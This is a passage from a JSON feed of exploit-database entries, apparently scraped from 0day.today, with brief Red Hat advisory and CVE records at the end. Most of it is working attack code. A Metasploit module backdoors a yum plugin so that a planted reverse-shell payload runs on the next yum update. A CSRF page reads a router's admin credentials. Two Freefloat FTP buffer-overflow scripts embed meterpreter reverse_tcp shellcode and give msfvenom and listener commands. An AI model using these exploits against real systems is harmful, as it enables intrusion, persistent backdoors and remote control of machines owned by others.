'Arch' =>\r\n [\r\n ARCH_CMD,\r\n ARCH_X86,\r\n ARCH_X64,\r\n ARCH_ARMLE,\r\n ARCH_AARCH64,\r\n ARCH_PPC,\r\n ARCH_MIPSLE,\r\n ARCH_MIPSBE\r\n ],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'DefaultOptions' => {\r\n 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true',\r\n 'Payload' => 'cmd/unix/reverse_python'\r\n },\r\n 'DisclosureDate' => '2003-12-17', # Date published, Robert G. Browns documentation on Yum\r\n 'References' => ['URL', 'https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/sec-yum_plugins'],\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n # /usr/lib/yum-plugins/fastestmirror.py is a default enabled plugin in centos\r\n OptString.new('PLUGIN', [true, 'Yum Plugin to target', 'fastestmirror']),\r\n OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/']),\r\n OptString.new('PluginPath', [true, 'Plugin Path to use', '/usr/lib/yum-plugins/'])\r\n ])\r\n end\r\n\r\n def exploit\r\n # checks /usr/lib/yum-plugins/PLUGIN.py exists and is writeable\r\n plugin = datastore['PLUGIN']\r\n full_plugin_path = \"#{datastore['PluginPath']}#{plugin}.py\"\r\n print_status(full_plugin_path)\r\n unless writable? full_plugin_path\r\n fail_with Failure::BadConfig, \"#{full_plugin_path} not writable, does not exist, or yum is not on system\"\r\n end\r\n\r\n # /etc/yum.conf must contain plugins=1 for plugins to run at all\r\n plugins_enabled = cmd_exec \"grep -F 'plugins=1' /etc/yum.conf\"\r\n unless plugins_enabled.include? 'plugins=1'\r\n fail_with Failure::NotVulnerable, 'Plugins are not set to be enabled in /etc/yum.conf'\r\n end\r\n print_good('Plugins are enabled!')\r\n\r\n # /etc/yum/pluginconf.d/PLUGIN.conf must contain enabled=1\r\n plugin_conf = \"/etc/yum/pluginconf.d/#{plugin}.conf\"\r\n plugin_enabled = cmd_exec \"grep -F 'enabled=1' #{plugin_conf}\"\r\n unless plugin_enabled.include? 'enabled=1'\r\n print_bad(\"#{plugin_conf} plugin is not configured to run\")\r\n fail_with Failure::NotVulnerable, \"try: grep -F 'enabled=1' /etc/yum/pluginconf.d/*\"\r\n end\r\n\r\n # plugins are made in python and generate pycs on successful execution\r\n unless exist? \"#{full_plugin_path}c\"\r\n print_warning('Either Yum has never been executed, or the selected plugin has not run')\r\n end\r\n\r\n # check for write in backdoor path and set/generate backdoor name\r\n backdoor_path = datastore['WritableDir']\r\n unless writable? backdoor_path\r\n fail_with Failure::BadConfig, \"#{backdoor_path} is not writable\"\r\n end\r\n backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)\r\n backdoor_path << backdoor_name\r\n\r\n # check that the plugin contains an import os, to backdoor\r\n import_os_check = cmd_exec \"grep -F 'import os' #{full_plugin_path}\"\r\n unless import_os_check.include? 'import os'\r\n fail_with Failure::NotVulnerable, \"#{full_plugin_path} does not import os, which is odd\"\r\n end\r\n\r\n # check for sed binary and then append launcher to plugin underneath\r\n print_status('Attempting to modify plugin')\r\n launcher = \"os.system('setsid #{backdoor_path} 2>/dev/null \\\\& ')\"\r\n sed_path = cmd_exec \"command -v sed\"\r\n unless sed_path.include?('sed')\r\n fail_with Failure::NotVulnerable, 'Module uses sed to modify plugin, sed was not found'\r\n end\r\n sed_line = \"#{sed_path} -ie \\\"/import os/ a #{launcher}\\\" #{full_plugin_path}\"\r\n cmd_exec sed_line\r\n\r\n # actually write users payload to be executed then check for write\r\n if payload.arch.first == 'cmd'\r\n write_file(backdoor_path, payload.encoded)\r\n else\r\n write_file(backdoor_path, generate_payload_exe)\r\n end\r\n unless exist? backdoor_path\r\n fail_with Failure::Unknown, \"Failed to write #{backdoor_path}\"\r\n end\r\n\r\n # change perms to reflect bins in /usr/local/bin/, give good feels\r\n chmod(backdoor_path, 0755)\r\n print_status(\"Backdoor uploaded to #{backdoor_path}\")\r\n print_status('Backdoor will run on next Yum update')\r\n end\r\nend\n\n# 0day.today [2019-05-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32627"}, {"lastseen": "2019-05-02T03:54:53", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32634", "href": "https://0day.today/exploit/description/32634", "title": "Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery Vulnerability", "type": "zdt", "sourceData": "<!--\r\n PoC based on CVE-2019-11416 created by Social Engineering Neo.\r\n\r\n Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/\r\n\r\n Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password.\r\n\r\n Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.\r\n-->\r\n\r\n<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n <title>IWR 3000N - CSRF on authenticated administrator</title>\r\n </head>\r\n <body>\r\n <button onclick=\"exploit()\">Exploit!</button>\r\n <p>Click the button to get the login and password.</p>\r\n <script>\r\n function exploit(){\r\n $.get( \"http://localhost:80/v1/system/user\" )\r\n .done(( data ) => {\r\n alert( data );\r\n })\r\n .fail(function( err, status) {\r\n alert( status );\r\n });\r\n }\r\n </script>\r\n <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js\"></script>\r\n </body>\r\n</html>\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32634"}, {"lastseen": "2019-05-02T03:54:40", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32641", "href": "https://0day.today/exploit/description/32641", "title": "Freefloat FTP Server 1.0 - SIZE Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Free Float FTP 1.0 \"SIZE\" Remote Buffer Overflow\r\n# Exploit Author: Kevin Randall\r\n# Vendor Homepage:\r\n# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip\r\n# Version: Firmware: Free Float FTP 1.0\r\n# Tested on: Windows XP Professional Service Pack 2\r\n# CVE : N/A\r\n\r\n#Generate Shellcode with MSFVenom\r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\\x00\\x0A\\x0D' -f python\r\n#Setup listener \"use exploit/multi/handler\" \"set payload windows/meterpreter/reverse_tcp\" \"set LHOST IP.OF.LOCAL.MACHINE\" \"set LPORT 4444\" \"exploit\"\r\n\r\n#!/usr/bin/python\r\n\r\nimport socket\r\nimport sys\r\n\r\nbuf = \"\"\r\nbuf += \"\\xba\\x99\\x2c\\xb1\\x7d\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5d\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x56\\x31\\x55\\x13\\x83\\xed\\xfc\\x03\\x55\\x96\\xce\"\r\nbuf += \"\\x44\\x81\\x40\\x8c\\xa7\\x7a\\x90\\xf1\\x2e\\x9f\\xa1\\x31\\x54\"\r\nbuf += \"\\xeb\\x91\\x81\\x1e\\xb9\\x1d\\x69\\x72\\x2a\\x96\\x1f\\x5b\\x5d\"\r\nbuf += \"\\x1f\\x95\\xbd\\x50\\xa0\\x86\\xfe\\xf3\\x22\\xd5\\xd2\\xd3\\x1b\"\r\nbuf += \"\\x16\\x27\\x15\\x5c\\x4b\\xca\\x47\\x35\\x07\\x79\\x78\\x32\\x5d\"\r\nbuf += \"\\x42\\xf3\\x08\\x73\\xc2\\xe0\\xd8\\x72\\xe3\\xb6\\x53\\x2d\\x23\"\r\nbuf += \"\\x38\\xb0\\x45\\x6a\\x22\\xd5\\x60\\x24\\xd9\\x2d\\x1e\\xb7\\x0b\"\r\nbuf += \"\\x7c\\xdf\\x14\\x72\\xb1\\x12\\x64\\xb2\\x75\\xcd\\x13\\xca\\x86\"\r\nbuf += \"\\x70\\x24\\x09\\xf5\\xae\\xa1\\x8a\\x5d\\x24\\x11\\x77\\x5c\\xe9\"\r\nbuf += \"\\xc4\\xfc\\x52\\x46\\x82\\x5b\\x76\\x59\\x47\\xd0\\x82\\xd2\\x66\"\r\nbuf += \"\\x37\\x03\\xa0\\x4c\\x93\\x48\\x72\\xec\\x82\\x34\\xd5\\x11\\xd4\"\r\nbuf += \"\\x97\\x8a\\xb7\\x9e\\x35\\xde\\xc5\\xfc\\x51\\x13\\xe4\\xfe\\xa1\"\r\nbuf += \"\\x3b\\x7f\\x8c\\x93\\xe4\\x2b\\x1a\\x9f\\x6d\\xf2\\xdd\\x96\\x7a\"\r\nbuf += \"\\x05\\x31\\x10\\xea\\xfb\\xb2\\x60\\x22\\x38\\xe6\\x30\\x5c\\xe9\"\r\nbuf += \"\\x87\\xdb\\x9c\\x16\\x52\\x71\\x97\\x80\\x9d\\x2d\\xa7\\x52\\x76\"\r\nbuf += \"\\x2f\\xa8\\x43\\xda\\xa6\\x4e\\x33\\xb2\\xe8\\xde\\xf4\\x62\\x48\"\r\nbuf += \"\\x8f\\x9c\\x68\\x47\\xf0\\xbd\\x92\\x82\\x99\\x54\\x7d\\x7a\\xf1\"\r\nbuf += \"\\xc0\\xe4\\x27\\x89\\x71\\xe8\\xf2\\xf7\\xb2\\x62\\xf6\\x08\\x7c\"\r\nbuf += \"\\x83\\x73\\x1b\\x69\\xf4\\x7b\\xe3\\x6a\\x91\\x7b\\x89\\x6e\\x33\"\r\nbuf += \"\\x2c\\x25\\x6d\\x62\\x1a\\xea\\x8e\\x41\\x19\\xed\\x71\\x14\\x2b\"\r\nbuf += \"\\x85\\x44\\x82\\x13\\xf1\\xa8\\x42\\x93\\x01\\xff\\x08\\x93\\x69\"\r\nbuf += \"\\xa7\\x68\\xc0\\x8c\\xa8\\xa4\\x75\\x1d\\x3d\\x47\\x2f\\xf1\\x96\"\r\nbuf += \"\\x2f\\xcd\\x2c\\xd0\\xef\\x2e\\x1b\\x62\\xf7\\xd0\\xd9\\x4d\\x50\"\r\nbuf += \"\\xb8\\x21\\xce\\x60\\x38\\x48\\xce\\x30\\x50\\x87\\xe1\\xbf\\x90\"\r\nbuf += \"\\x68\\x28\\xe8\\xb8\\xe3\\xbd\\x5a\\x59\\xf3\\x97\\x3b\\xc7\\xf4\"\r\nbuf += \"\\x14\\xe0\\xf8\\x8f\\x55\\x17\\xf9\\x6f\\x7c\\x7c\\xfa\\x6f\\x80\"\r\nbuf += \"\\x82\\xc7\\xb9\\xb9\\xf0\\x06\\x7a\\xfe\\x0b\\x3d\\xdf\\x57\\x86\"\r\nbuf += \"\\x3d\\x73\\xa7\\x83\"\r\n\r\n\r\nshellcode = '\\x90'*20 + buf\r\npayload = \"A\"*247+\"\\xF6\\xC1\\xB3\\x7C\"+ shellcode +\"C\"*(749-len(shellcode))\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n##Add FTP Server IP Here###############\r\nconnect = s.connect(('192.168.0.9',21))\r\n#######################################\r\ns.recv(1024)\r\ns.send('USER anonymous\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('PASS anonymous\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('SIZE' + payload + '\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('QUIT\\r\\n')\r\n\r\ns.close()\r\n\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32641"}, {"lastseen": "2019-05-02T03:55:07", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-05-01T00:00:00", "published": "2019-05-01T00:00:00", "id": "1337DAY-ID-32640", "href": "https://0day.today/exploit/description/32640", "title": "Freefloat FTP Server 1.0 - STOR Remote Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Free Float FTP 1.0 \"STOR\" Remote Buffer Overflow\r\n# Exploit Author: Kevin Randall\r\n# Vendor Homepage:\r\n# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip\r\n# Version: Firmware: Free Float FTP 1.0\r\n# Tested on: Windows XP Professional Service Pack 2\r\n# CVE : N/A\r\n\r\n#Generate Shellcode with MSFVenom\r\n#msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP.OF.LOCAL.MACHINE LPORT=4444 -b '\\x00\\x0A\\x0D' -f python\r\n#Setup listener \"use exploit/multi/handler\" \"set payload windows/meterpreter/reverse_tcp\" \"set LHOST IP.OF.LOCAL.MACHINE\" \"set LPORT 4444\" \"exploit\"\r\n\r\n#!/usr/bin/python\r\n\r\nimport socket\r\nimport sys\r\n\r\nbuf = \"\"\r\nbuf += \"\\xba\\x99\\x2c\\xb1\\x7d\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5d\\x2b\"\r\nbuf += \"\\xc9\\xb1\\x56\\x31\\x55\\x13\\x83\\xed\\xfc\\x03\\x55\\x96\\xce\"\r\nbuf += \"\\x44\\x81\\x40\\x8c\\xa7\\x7a\\x90\\xf1\\x2e\\x9f\\xa1\\x31\\x54\"\r\nbuf += \"\\xeb\\x91\\x81\\x1e\\xb9\\x1d\\x69\\x72\\x2a\\x96\\x1f\\x5b\\x5d\"\r\nbuf += \"\\x1f\\x95\\xbd\\x50\\xa0\\x86\\xfe\\xf3\\x22\\xd5\\xd2\\xd3\\x1b\"\r\nbuf += \"\\x16\\x27\\x15\\x5c\\x4b\\xca\\x47\\x35\\x07\\x79\\x78\\x32\\x5d\"\r\nbuf += \"\\x42\\xf3\\x08\\x73\\xc2\\xe0\\xd8\\x72\\xe3\\xb6\\x53\\x2d\\x23\"\r\nbuf += \"\\x38\\xb0\\x45\\x6a\\x22\\xd5\\x60\\x24\\xd9\\x2d\\x1e\\xb7\\x0b\"\r\nbuf += \"\\x7c\\xdf\\x14\\x72\\xb1\\x12\\x64\\xb2\\x75\\xcd\\x13\\xca\\x86\"\r\nbuf += \"\\x70\\x24\\x09\\xf5\\xae\\xa1\\x8a\\x5d\\x24\\x11\\x77\\x5c\\xe9\"\r\nbuf += \"\\xc4\\xfc\\x52\\x46\\x82\\x5b\\x76\\x59\\x47\\xd0\\x82\\xd2\\x66\"\r\nbuf += \"\\x37\\x03\\xa0\\x4c\\x93\\x48\\x72\\xec\\x82\\x34\\xd5\\x11\\xd4\"\r\nbuf += \"\\x97\\x8a\\xb7\\x9e\\x35\\xde\\xc5\\xfc\\x51\\x13\\xe4\\xfe\\xa1\"\r\nbuf += \"\\x3b\\x7f\\x8c\\x93\\xe4\\x2b\\x1a\\x9f\\x6d\\xf2\\xdd\\x96\\x7a\"\r\nbuf += \"\\x05\\x31\\x10\\xea\\xfb\\xb2\\x60\\x22\\x38\\xe6\\x30\\x5c\\xe9\"\r\nbuf += \"\\x87\\xdb\\x9c\\x16\\x52\\x71\\x97\\x80\\x9d\\x2d\\xa7\\x52\\x76\"\r\nbuf += \"\\x2f\\xa8\\x43\\xda\\xa6\\x4e\\x33\\xb2\\xe8\\xde\\xf4\\x62\\x48\"\r\nbuf += \"\\x8f\\x9c\\x68\\x47\\xf0\\xbd\\x92\\x82\\x99\\x54\\x7d\\x7a\\xf1\"\r\nbuf += \"\\xc0\\xe4\\x27\\x89\\x71\\xe8\\xf2\\xf7\\xb2\\x62\\xf6\\x08\\x7c\"\r\nbuf += \"\\x83\\x73\\x1b\\x69\\xf4\\x7b\\xe3\\x6a\\x91\\x7b\\x89\\x6e\\x33\"\r\nbuf += \"\\x2c\\x25\\x6d\\x62\\x1a\\xea\\x8e\\x41\\x19\\xed\\x71\\x14\\x2b\"\r\nbuf += \"\\x85\\x44\\x82\\x13\\xf1\\xa8\\x42\\x93\\x01\\xff\\x08\\x93\\x69\"\r\nbuf += \"\\xa7\\x68\\xc0\\x8c\\xa8\\xa4\\x75\\x1d\\x3d\\x47\\x2f\\xf1\\x96\"\r\nbuf += \"\\x2f\\xcd\\x2c\\xd0\\xef\\x2e\\x1b\\x62\\xf7\\xd0\\xd9\\x4d\\x50\"\r\nbuf += \"\\xb8\\x21\\xce\\x60\\x38\\x48\\xce\\x30\\x50\\x87\\xe1\\xbf\\x90\"\r\nbuf += \"\\x68\\x28\\xe8\\xb8\\xe3\\xbd\\x5a\\x59\\xf3\\x97\\x3b\\xc7\\xf4\"\r\nbuf += \"\\x14\\xe0\\xf8\\x8f\\x55\\x17\\xf9\\x6f\\x7c\\x7c\\xfa\\x6f\\x80\"\r\nbuf += \"\\x82\\xc7\\xb9\\xb9\\xf0\\x06\\x7a\\xfe\\x0b\\x3d\\xdf\\x57\\x86\"\r\nbuf += \"\\x3d\\x73\\xa7\\x83\"\r\n\r\n\r\nshellcode = '\\x90'*20 + buf\r\npayload = \"A\"*247+\"\\xF6\\xC1\\xB3\\x7C\"+ shellcode +\"C\"*(749-len(shellcode))\r\n\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n##Add FTP Server IP Here###############\r\nconnect = s.connect(('192.168.0.9',21))\r\n#######################################\r\n\r\ns.recv(1024)\r\ns.send('USER anonymous\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('PASS anonymous\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('STOR' + payload + '\\r\\n')\r\n\r\ns.recv(1024)\r\ns.send('QUIT\\r\\n')\r\n\r\ns.close()\r\n\n\n# 0day.today [2019-05-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32640"}], "redhat": [{"lastseen": "2019-04-30T16:20:43", "bulletinFamily": "unix", "description": "This release of Red Hat Fuse 7.3 serves as a replacement for Red Hat Fuse 7.2, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* jackson-databind: A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525)\n\n* struts2: ClassLoader manipulation via request parameters (CVE-2014-0112)\n\n* jetty: HTTP request smuggling (CVE-2017-7657)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-04-30T19:17:33", "published": "2019-04-30T19:17:04", "id": "RHSA-2019:0910", "href": "https://access.redhat.com/errata/RHSA-2019:0910", "type": "redhat", "title": "(RHSA-2019:0910) Important: Red Hat Fuse 7.3 security update", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-05-02T11:54:39", "bulletinFamily": "NVD", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "modified": "2019-05-01T10:22:21", "published": "2019-04-30T10:29:00", "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "title": "CVE-2015-9286", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}
